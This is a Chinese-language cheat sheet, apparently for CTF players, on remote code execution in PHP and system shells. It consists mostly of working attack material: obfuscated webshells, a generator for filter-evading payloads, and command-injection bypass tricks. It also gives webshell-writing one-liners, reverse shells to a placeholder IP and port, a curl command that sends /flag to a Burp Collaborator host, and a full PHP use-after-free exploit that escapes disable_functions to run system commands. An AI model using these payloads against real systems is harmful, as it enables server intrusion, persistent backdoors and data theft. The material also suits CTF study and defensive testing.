RCE
1.PHP代码执行
标签
<?=system('whoami');?>
<?system('whoami'); // PHP<5.5?>
<script language="php">system('whoami'); // PHP<7.0</script>
代码执行函数
<?php
eval("system('whoami');"); // 不支持动态调用
assert("system('whoami')"); // PHP>7.0不支持动态调用
preg_replace('/a/e',"system('whoami')",'a'); // PHP<7.0
array_map('system',['whoami']);
call_user_func('system','whoami');
create_function('$a',"}system('whoami');/*");
// php>7.4、开启FFI扩展,可以调用C语言
$ffi = FFI::cdef("int system(char *command);"); //创建一个system对象
$ffi->system('whoami');
变形
WebShell
拼接:
<?php
@$N = (_/_._)[_]; // 字母N
$r = '_P'.++$N.'ST'; // 构造_POST
$$r[1]($$r[2]);
进制运算:
<?php
/*
dechex,10进制转16进制
base_convert,将 参数1 从 参数2 进制转为 参数3 进制
base_convert(26941962055, 10, 34) 为 hex2bin
hex2bin,16进制转字符串
*/
$g = base_convert(26941962055, 10, 34)(dechex(1598506324)); // 构造_GET
@$$g[1]($$g[2]);
Payload生成
~运算:
<?php
$function_name = 'system';
$parameter = 'whoami';
echo '?1=assert&2=(~'.urlencode(~$function_name).')(~'.urlencode(~$parameter).')';
&、|、^运算:
<?php
$function_name = 'system';
$parameter = 'whoami';
function GetResult($code, $symbol) {
$before = '';
$after = '';
for ($i = 0; $i < strlen($code); $i++) { // 遍历code
for ($a = 0; $a < 256; $a++) { // 穷举所有字符
for ($b = 0; $b < 256; $b++) { // 穷举所有字符
switch ($symbol) { // 运算
case '&':
$result=chr($a)&chr($b);
break;
case '|':
$result=chr($a)|chr($b);
break;
case '^':
$result=chr($a)^chr($b);
break;
}
if ($result == $code[$i] && chr($a) != $code[$i] && chr($b) != $code[$i]) { // 运算结果符合
$before.= urlencode(chr($a));
$after.= urlencode(chr($b));
$a = $b = 257; // 找下一个code字符
}
}
}
}
return '("'.$before.'"'.urlencode($symbol).'"'.$after.'")';
}
$symbols = '&|^';
for ($i = 0; $i < 3; $i++) { // 遍历运算符
echo $symbols[$i].' 运算:?1=assert&2='.GetResult($function_name, $symbols[$i]).GetResult($parameter, $symbols[$i]).'<br>';
}
2.PHP命令执行函数
<?php
system('whoami');
passthru('whoami');
echo `whoami`;
echo shell_exec('whoami');
echo exec('ipconfig'); // 只有结果的最后一行
exec('ipconfig', $out);
print_r($out); // 全部
popen('whoami > d:/1.txt', 'r'); // 无回显
3.其他可利用函数
设置php.ini
ini_set('display_errors', 1);
返回所有已定义变量的数组
get_defined_vars()
等效ls
<?php
// 以下方法中的路径均可用 glob协议 代替,'glob://*.*'
/*
getcwd(),返回当前路径
current()、pos()、reset(),返回数组当前元素,初始第一个
scandir(),返回目录中文件和文件夹的数组
*/
print_r(scandir(getcwd()));
echo '<br><br><br>';
// localeconv(),返回本地数字及货币格式信息的数组,第一个值为.
print_r(scandir(reset(localeconv())));
echo '<br><br><br>';
// 打开当前目录
$handle = opendir('.');
while ($f = readdir($handle)) {
echo $f;
}
echo '<br><br><br>';
// FilesystemIterator迭代器
$iterator = new FilesystemIterator('.');
foreach($iterator as $f) {
echo $f;
}
echo '<br><br><br>';
// DirectoryIterator迭代器
$all=new DirectoryIterator('.');
foreach($all as $f) {
echo $f.'<br>';
}
等效cat
利用MySQL读取文件:
<?php
$conn = new mysqli('localhost', 'root', 'root', 'lx');
$result = $conn->query("select load_file('d:/flag')");
echo $result->fetch_row()[0];
$conn = new PDO('mysql:host=localhost;dbname=lx', 'root', 'root');
foreach ($conn->query("select load_file('d:/flag')") as $row) {
echo ($row[0]);
}
4.系统命令
Windows
连接符
rem 互不影响
whoami & whoami
rem 前面错误后面不执行
xxx && whoami
rem 前面输出作为后面输入,前面错误后面不执行
dir d:\ | find "flag"
rem 前面错误后面才执行
xxx || whoami
rem 分隔作用
(whoami)&&(whoami)
文件命令
rem 等效cat
type fla?
rem 等效find
dir /s /b d:\fl*
rem 等效grep
findstr /s fl*} d:\*.txt
rem 写入文件
echo "<?php @eval($_POST['cmd']);?>" > shell.php
绕过
whoam"i"
whoam^i
set a=who&set b=ami&cmd /c %a%%b%
Linux
连接符
# 互不影响
whoami ; whoami
whoami %0a whoami
# & 前面的命令在后台执行,PHP system()都有回显
echo 1 > /1 & whoami
# 前面错误后面不执行
xxx && whoami
# 前面输出作为后面输入,前面错误后面【执行】
ls | find flag
xxx | whoami
# 前面错误后面才执行
xxx || whoami
# 分隔作用
(whoami)&&(whoami)
通配符
cat /f*
cat /fla?
cat /fla[fgh]
cat /fla[f-h]
cat /fla[^a-f]
文件命令
# 按文件名查找文件
find /var/www/html -name fl*
# 按字符串查找文件(忽略大小写、递归)
grep -i -r fl* /var/www/html
# 查看文件内容
cat /f*
tac /f*
nl /f*
strings /f*
base64 /f*
awk "{print}" /f*
cp index.php 1 # 然后下载
rev /f* # 每行倒着
less /f*
more /f*
head /f* # 前10行
tail /f* # 后10行
curl file:///flag # 绝对路径、不能用通配符
curl -X POST -F filename=@/flag xxx.burpcollaborator.net # 用Burp接收,相对路径或绝对路径
# 写入文件
echo \<\?php @eval(\$_POST\[\'cmd\'\])\;?\> > shell.php
echo \<\?php @eval(\$_POST\[\'cmd\'\])\;?\> | tee shell.php
其他可利用命令
# 反弹shell
nc IP 端口 -e /bin/bash
bash -i >& /dev/tcp/IP/端口 0>&1 # 标准输出和标准错误输出重定向到socket,标准输入重定向到标准输出
/bin/bash -c 'bash -i >& /dev/tcp/IP/端口 0>&1'
# Python,Windows同
python -c "import os;os.system('whoami');"
# PHP,Windows同
php -r "system('whoami');"
# 下载文件
wget -P /tmp http://IP:80/shell.sh
绕过
有的命令如果你的 shell 不支持,可以尝试用 bash -c '命令'
# 干扰
cat /''fl``a"g" # 引号
c\at /fl\ag # 反斜杠
cat$a $a/xxx$a/flag$a # 未初始化空变量,不能破坏 /名称
# 以路径执行
/bin/cat /flag
/???/????64 ????.??? # /bin/base64 flag.php
/???/???/????2 ????.??? # /usr/bin/bzip2 flag.php,会压缩成flag.php.bz2,原来的没了
# 空格绕过
cat</flag
cat<>/flag
cat%09/flag
cat$IFS/flag
cat${IFS}/flag
{cat,/flag}
{ls,}
# 重组
a=l;b=s;$a$b
`echo d2hvYW1pCg== | base64 -d`
$(echo d2hvYW1pCg== | base64 -d)
echo 77686f616d69 | xxd -r -p | bash # 16进制
$'\x77\x68\x6f\x61\x6d\x69'
`printf '\x77\x68\x6f\x61\x6d\x69'`
$(printf '\x77\x68\x6f\x61\x6d\x69')
$'\167\150\157\141\155\151' # ASCII的8进制
`printf '\167\150\157\141\155\151'`
$(printf '\167\150\157\141\155\151')
5.CTF
命令
长度限制
追加:echo xxx >1、echo xxx >>1、mv 1 1.php
nl文件名利用,CTFshow-_萌新-获得百分之百的快乐 - LeiyNeKo - 博客园 (cnblogs.com)
内容限制
环境变量命令执行,CTFshow-WEB入门-命令执行web122 - LeiyNeKo - 博客园 (cnblogs.com)
命令盲注,CTFshow-WEB入门-php特性web139 - LeiyNeKo - 博客园 (cnblogs.com)
(())是整数运算命令,取反~x=-x-1,$(())是0、$((~$(())))是1、$(($((~$(())))$((~$(())))))等效$((-1-1))是-2
其他
system($c." >/dev/null 2>&1");输出都进了黑洞,用%0a或;绕过
代码
长度限制
eval(substr($F,0,6)),这种可以用外带?F=`$F`;+命令
内容限制
\system(),这样可以非字母开头执行,因为\是最大命名空间
Python的gmpy2库,CTFshow-_菜狗杯-算力升级 - LeiyNeKo - 博客园 (cnblogs.com)
其他
eval("$x('111')$y");可执行
后跟die();或exit();来绕过缓冲区清除
临时文件命令执行,CTFshow-WEB入门-命令执行web56 - LeiyNeKo - 博客园 (cnblogs.com)
CTFshow web102,CTFshow-WEB入门-php特性web102 - LeiyNeKo - 博客园 (cnblogs.com)
php.ini开启open_basedir会限制文件访问范围,可以用glob伪协议绕过,安全目录绕过脚本(读取文件):
function ctfshow($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();
